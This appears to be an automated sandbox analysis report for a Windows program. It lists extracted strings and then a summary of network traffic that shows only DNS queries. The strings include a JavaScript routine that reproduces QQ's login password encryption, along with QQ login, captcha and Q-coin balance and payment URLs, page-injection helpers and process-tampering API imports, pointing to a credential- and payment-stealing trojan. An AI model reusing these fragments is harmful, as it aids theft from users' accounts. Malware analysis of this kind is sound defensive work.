function jm(p,u,c){var pwd=md5(p),h1=hexchar2bin(pwd),salt=uin2hex(u),s2=md5(h1+salt),rsaH1=$.RSA.rsa_encrypt(h1),rsaH1Len=(rsaH1.length/2).toString(16),hexVcode=s.TEA.strToBytes(c.toUpperCase()),vcodeLen='000'+c.length.toString(16);while(rsaH1Len.length<4){rsaH1Len='0'+rsaH1Len}
s.TEA.initkey(s2);var saltPwd=s.TEA.enAsBase64(rsaH1Len+rsaH1+s.TEA.strToBytes(salt)+vcodeLen+hexVcode);s.TEA.initkey('');__monitor(488358,1);return saltPwd.replace(/[\/\+=]/g,function(a){return{'/':'-','+':'*','=':'_'}
[a]})}
&pt_uistyle=20&aid=12000101&
&pt_randsalt=0&ptredirect=1&u1=http%3A%2F%2Fkf.qq.com%2F&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-16-1427638320630&js_ver=10117&js_type=1&login_sig=
&pt_vcode_v1=0&pt_verifysession_v1=
&verifycode=
http://ptlogin2.qq.com/login?u=
1NTNINQKSL6K9KkLnJdLkNeJ7LLNmJcLiLjNSJjD9N8JvL
http://my.pay.qq.com/cgi-bin/account/ajax_query.cgi?cmd=32&_=
http://my.pay.qq.com/cgi-bin/personal/balance_query_sortflow.cgi?_=
"qb_balance": "
function time(){return new Date().getTime()}
http://captcha.qq.com/getimage?aid=11000101&r=
http://my.pay.qq.com/cgi-bin/account/ajax_query.cgi?cmd=31&extcode=
http://pay.qq.com/ipay/index.shtml?c=xxxy&aid=pay.paygame.xx.outer&ch=qdqb
parentWindow
IPAY.updateTargetUin("
execScript
length
data-value
getAttribute
"><a class="radio-box" href="javascript:void(0);">500<i class="icon-check"></i></a></label>
<label class="selected" data-action="updateAmount" data-value="
outerHTML
innerText
qdqb_submit
button
@p@Error
http://cf.qq.com/act/a20141214luxury/?ADTAG=client.btn.detail
about:
http://i3.tietuku.com/d95480b8cd6b954b.png
http://i3.tietuku.com/801db876cdcaa96c.png
Win.ini
Windows
system.ini
Explorer.exe
AtlAxWin
{00000117-0000-0000-C000-000000000046}
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
CometLoadDialog
Comet_Thread
Comet_Image
Comet_Stream
CometHitMove
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
{B96B3CAB-0728-11D3-9D7B-0000F81EF32E}
Column
Number
Source
Description
VBScript
AddCode
TaskbarCreated
WTWindow
PngControl_Type
PngControl_WndProc
PngControl_BackType
PngControl_CacheBitmap
Comet_DrawState
PngControl_OverlImage
PngControl_DownImage
PngControl_DisableImage
PngControl_NormalImage
PngControl_TextColor
tooltips_class32
Comet_ToolTips
Static
PngControl_BackImage
Shell_Explorer.1
Navigate
GoForward
GoBack
GoHome
GoSearch
Refresh
SaveAs
PrintPreview
PageSetup
ExecWB
Document
Offline
Silent
StatusText
LocationURL
ReadyState
documentElement
Button
VBScript.RegExp
IgnoreCase
Multiline
Singleline
Global
Pattern
Execute
Replace
FirstIndex
SubMatches
kernel32
kernel32.dll
wininet.dll
ole32.dll
oleaut32.dll
user32.dll
gdi32.dll
user32
atl.dll
GdiPlus.dll
gdiplus.dll
gdiplus
Kernel32
Gdiplus.dll
msimg32.dll
shell32.dll
User32.dll
Ole32.dll
GetModuleHandleA
GetModuleFileNameA
CreateToolhelp32Snapshot
Process32First
CloseHandle
Process32Next
OpenProcess
TerminateProcess
GetFileAttributesA
SetFileAttributesA
CreateWaitableTimerA
SetWaitableTimer
MsgWaitForMultipleObjects
CancelWaitableTimer
GetDesktopWindow
GetWindow
GetWindowThreadProcessId
IsWindowVisible
GetWindowTextA
ShellExecuteA
GetCurrentProcessId
InternetOpenA
InternetCloseHandle
InternetConnectA
HttpOpenRequestA
HttpSendRequestA
InternetReadFile
HttpQueryInfoA
Module32First
GetWindowLongA
SetWindowLongA
SetLayeredWindowAttributes
GlobalAlloc
GlobalLock
GlobalFree
RtlMoveMemory
GlobalUnlock
CreateStreamOnHGlobal
OleLoadPicture
CopyImage
CopyIcon
GetDeviceCaps
MulDiv
ReleaseDC
CreateFontA
WideCharToMultiByte
MultiByteToWideChar
CoInitialize
GetInputState
CoUninitialize
GetWindowsDirectoryA
GetMessageA
AtlAxGetControl
GetParent
TranslateAcceleratorA
IsDialogMessageA
TranslateMessage
DispatchMessageA
IsWindow
GetClassNameA
CLSIDFromString
AtlAxWinInit
LocalSize
LoadCursorA
RegisterClassExA
GdiplusStartup
GetPropA
TerminateThread
GdipDisposeImage
DefWindowProcA
ReleaseCapture
SendMessageA
GdipAlloc
GdipFree
GdipDisposeImageAttributes
GdipCreateImageAttributes
GdipCloneImageAttributes
GdipSetImageAttributesToIdentity
GdipResetImageAttributes
GdipSetImageAttributesThreshold
GdipSetImageAttributesNoOp
GdipSetImageAttributesGamma
GdipSetImageAttributesColorKeys
GdipSetImageAttributesOutputChannel
GdipSetImageAttributesOutputChannelColorProfile
GdipSetImageAttributesRemapTable
GdipSetImageAttributesWrapMode
GdipGetImageAttributesAdjustedPalette
GdipSetImageAttributesColorMatrix
GdipCreateBitmapFromFileICM
GdipCreateBitmapFromFile
GdipCreateBitmapFromStreamICM
GdipCreateBitmapFromStream
GdipCloneImage
GdipSaveImageToFile
SetHandleCount
GdipGetImageEncodersSize
GdipGetImageEncoders
StringFromGUID2
GdipSaveImageToStream
GdipSaveAdd
GdipSaveAddImage
GdipGetEncoderParameterListSize
GdipGetEncoderParameterList
GdipGetImageRawFormat
GdipGetImageBounds
GdipGetImageDimension
GdipGetImageType
GdipGetImageWidth
GdipGetImageHeight
GdipGetImageHorizontalResolution
GdipGetImageVerticalResolution
GdipGetImageFlags
GdipGetImagePixelFormat
GdipGetImageThumbnail
GdipImageGetFrameCount
GdipImageGetFrameDimensionsCount
GdipImageGetFrameDimensionsList
GdipImageSelectActiveFrame
GdipGetPropertyItemSize
GdipGetPropertyItem
GdipSetPropertyItem
GdipRemovePropertyItem
GdipGetPropertyCount
GdipGetPropertyIdList
GdipImageRotateFlip
GdipGetImagePaletteSize
GdipGetImagePalette
GdipSetImagePalette
GdipCreateBitmapFromScan0
GdipCreateBitmapFromGraphics
GdipCreateBitmapFromGdiDib
GdipCreateBitmapFromHBITMAP
GdipCreateBitmapFromHICON
GdipCreateBitmapFromResource
GdipCreateHBITMAPFromBitmap
GdipCreateHICONFromBitmap
GdipCloneBitmapArea
GdipCloneBitmapAreaI
GdipBitmapLockBits
GdipBitmapUnlockBits
GdipBitmapGetPixel
GdipBitmapSetPixel
GdipBitmapSetResolution
GdipBitmapApplyEffect
GdipGetImageGraphicsContext
GdipCreateSolidFill
GdipDeleteGraphics
GdipFillRectangle
GdipDeleteBrush
GdipSetInterpolationMode
GdipCreateMatrix
GdipTranslateMatrix
GdipRotateMatrix
GdipSetWorldTransform
GdipDrawImage
GdipResetWorldTransform
GdipDeleteMatrix
GetCurrentProcess
WriteProcessMemory
CallWindowProcA
GlobalSize
GetHGlobalFromStream
SelectObject
DeleteObject
DeleteDC
GdipFlush
GdipCreateFromHWNDICM
GdipCreateFromHWND
GdipCreateFromHDC
GdipCreateFromHDC2
GdipGetDC
GdipReleaseDC
GdipGetCompositingMode
GdipSetCompositingMode
GdipGetRenderingOrigin
GdipSetRenderingOrigin
GdipGetCompositingQuality
GdipSetCompositingQuality
GdipSetSmoothingMode
GdipGetSmoothingMode
GdipSetTextRenderingHint
GdipGetTextRenderingHint
GdipGetInterpolationMode
GdipSetPixelOffsetMode
GdipGetPixelOffsetMode
GdipGetWorldTransform
GdipMultiplyWorldTransform
GdipTranslateWorldTransform
GdipScaleWorldTransform
GdipRotateWorldTransform
GdipSetPageUnit
GdipGetPageUnit
GdipSetPageScale
GdipGetPageScale
GdipGetDpiX
GdipGetDpiY
GdipTransformPoints
GdipTransformPointsI
GdipGetNearestColor
GdipDrawLine
GdipDrawLineI
GdipDrawLines
GdipDrawLinesI
GdipDrawArc
GdipDrawArcI
GdipDrawBezier
GdipDrawBezierI
GdipDrawBeziers
GdipDrawBeziersI
GdipDrawRectangle
GdipDrawRectangleI
GdipDrawRectangles
GdipDrawRectanglesI
GdipDrawEllipse
GdipDrawEllipseI
GdipDrawPie
GdipDrawPieI
GdipDrawPolygon
GdipDrawPolygonI
GdipDrawPath
GdipDrawCurve
GdipDrawCurveI
GdipDrawCurve2
GdipDrawCurve2I
GdipDrawCurve3
GdipDrawCurve3I
GdipDrawClosedCurve
GdipDrawClosedCurveI
GdipDrawClosedCurve2
GdipDrawClosedCurve2I
CreatePen
GetStockObject
Rectangle
GdipFillRectangleI
GdipFillRectangles
GdipFillRectanglesI
GdipFillPolygon
GdipFillPolygonI
GdipFillEllipse
GdipFillEllipseI
GdipFillPie
GdipFillPieI
GdipFillPath
GdipFillClosedCurve
GdipFillClosedCurve2
GdipFillClosedCurveI
GdipFillClosedCurve2I
GdipFillRegion
lstrlenW
GdipDrawString
GdipMeasureString
GdipCreateRegion
GdipMeasureCharacterRanges
GdipDrawDriverString
GdipSetTextContrast
GdipGetTextContrast
GdipDrawImageI
GdipDrawCachedBitmap
GdipDrawImageRectRect
GdipDrawImageRectRectI
GdipDrawImagePoints
GdipDrawImagePointsI
GdipDrawImagePointRect
GdipDrawImagePointRectI
GdipDrawImagePointsRect
GdipDrawImagePointsRectI
GdipEnumerateMetafileDestPoint
GdipEnumerateMetafileDestPointI
GdipEnumerateMetafileDestPoints
GdipEnumerateMetafileDestPointsI
GdipEnumerateMetafileDestRect
GdipEnumerateMetafileDestRectI
GdipEnumerateMetafileSrcRectDestPoint
GdipEnumerateMetafileSrcRectDestPointI
GdipEnumerateMetafileSrcRectDestPoints
GdipEnumerateMetafileSrcRectDestPointsI
GdipEnumerateMetafileSrcRectDestRect
GdipEnumerateMetafileSrcRectDestRectI
GdipSetClipGraphics
GdipSetClipPath
GdipSetClipRect
GdipSetClipRectI
GdipSetClipRegion
GdipSetClipHrgn
GdipResetClip
GdipTranslateClip
GdipTranslateClipI
GdipGetClip
GdipGetClipBounds
GdipGetClipBoundsI
GdipGetVisibleClipBounds
GdipGetVisibleClipBoundsI
GdipIsClipEmpty
GdipIsVisibleClipEmpty
GdipIsVisiblePoint
GdipIsVisiblePointI
GdipIsVisibleRect
GdipIsVisibleRectI
GdipSaveGraphics
GdipRestoreGraphics
GdipBeginContainer
GdipBeginContainerI
GdipBeginContainer2
GdipEndContainer
GdipComment
CreateCompatibleDC
CreateDIBSection
SetBkMode
BitBlt
StretchBlt
AlphaBlend
GdiTransparentBlt
TransparentBlt
GetPixel
BeginPaint
EndPaint
DragQueryFileA
DragFinish
GetAsyncKeyState
GetClientRect
DestroyWindow
Shell_NotifyIconA
DefMDIChildProcA
SetCursor
TrackMouseEvent
DestroyIcon
GetProcessHeap
HeapFree
PostQuitMessage
DestroyCursor
CreateWindowExA
GetDlgItem
SetFocus
GetFocus
GetWindowRect
ScreenToClient
InvalidateRect
ValidateRect
UpdateWindow
MoveWindow
SetWindowPos
PostMessageA
SetParent
ShowWindow
IsWindowEnabled
EnableWindow
GetWindowTextLengthA
SetWindowTextA
MessageBoxA
SetPropA
RemovePropA
SetWindowRgn
GetObjectA
SetRect
ExtCreateRegion
CombineRgn
CreateRoundRectRgn
DragAcceptFiles
GetClassLongA
SetClassLongA
FillRect
GetSysColor
CreateSolidBrush
CreatePatternBrush
IsIconic
IsZoomed
GetSystemMetrics
GetMenu
SetMenu
DrawMenuBar
RegisterWindowMessageA
HeapAlloc
RegisterHotKey
UnregisterHotKey
SetActiveWindow
GetWindowDC
CreateCompatibleBitmap
GdipDrawImageRect
SetTextColor
GdipLoadImageFromStream
AtlUnadvise
AtlAdvise
DrawIcon
DrawIconEx
GetIconInfo
SetBkColor
FillRgn
FrameRgn
DrawTextA
GdipDeleteRegion
GdipCreateRegionRect
GdipCreateRegionRectI
GdipCreateRegionPath
GdipCreateRegionHrgn
GdipCreateRegionRgnData
GdipCloneRegion
GdipSetInfinite
GdipSetEmpty
GdipCombineRegionRect
GdipCombineRegionRectI
GdipCombineRegionRegion
GdipCombineRegionPath
GdipTranslateRegion
GdipTranslateRegionI
GdipTransformRegion
GdipGetRegionBounds
GdipGetRegionBoundsI
GdipGetRegionDataSize
GdipGetRegionData
GdipGetRegionHRgn
GdipIsEmptyRegion
GdipIsInfiniteRegion
GdipIsEqualRegion
GdipIsVisibleRegionPoint
GdipIsVisibleRegionPointI
GdipIsVisibleRegionRect
GdipIsVisibleRegionRectI
GdipGetRegionScansCount
GdipGetRegionScans
GdipGetRegionScansI
CreateMenu
CreatePopupMenu
GetSystemMenu
LoadMenuA
DestroyMenu
AppendMenuA
GetMenuItemCount
InsertMenuA
SetMenuInfo
GetSubMenu
GetMenuItemID
CheckMenuRadioItem
SetForegroundWindow
TrackPopupMenu
GetMenuStringA
GetMenuItemInfoA
GetMenuItemRect
GetMenuState
GetMenuInfo
GetMenuDefaultItem
MenuItemFromPoint
RemoveMenu
CheckMenuItem
SetMenuItemInfoA
SetMenuItemBitmaps
SetMenuDefaultItem
program internal error number is %d. (0x%Xh)
DLL ERROR
:"%s".
%d%d%d
SyscaemesrlySyscaemfnxtlSyscaemgavyqSyscaemepfuzSyscaematwjaSysceamrwttnSyscaemzkshtSysceamuwrifSyscaemkstswSyscaembtgpjSyscaemzeamwSysceamtbgkrSysceambcoxlSysceamjvqzsSysceamlfihySysceamycpbtSyscaemimdjsSysceamvczweSyscaemasliaSysceamxvqknSysceambgfmxSyscaemehzliSyscaemsliroSysceamphattSysceamkejlcSyscaemkbseoSyscaembrjruSyscaemljourSysceamkxhjtSysceamzwsziSysceamzmayuSysceamubuweSysceamdhiifSysceamrtdvvSysceampmmmaSysceamtjsfdSysceammyyhjSyscaemqcwytSyscaemhmyxvSysceamcbzdy
BBBBBB
BBBBBB
BBBBBB
BBBBBB
BBBBBB
CCCCCCCCC
CCCCmD
CCCCCCCCC

TCP

No TCP connections recorded.

UDP

Source Source Port Destination Destination Port
192.168.56.101 53179 224.0.0.252 5355
192.168.56.101 49642 224.0.0.252 5355
192.168.56.101 137 192.168.56.255 137
192.168.56.101 61714 114.114.114.114 53
192.168.56.101 61714 8.8.8.8 53
192.168.56.101 56933 8.8.8.8 53
192.168.56.101 138 192.168.56.255 138
192.168.56.101 58485 114.114.114.114 53
192.168.56.101 57665 114.114.114.114 53

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.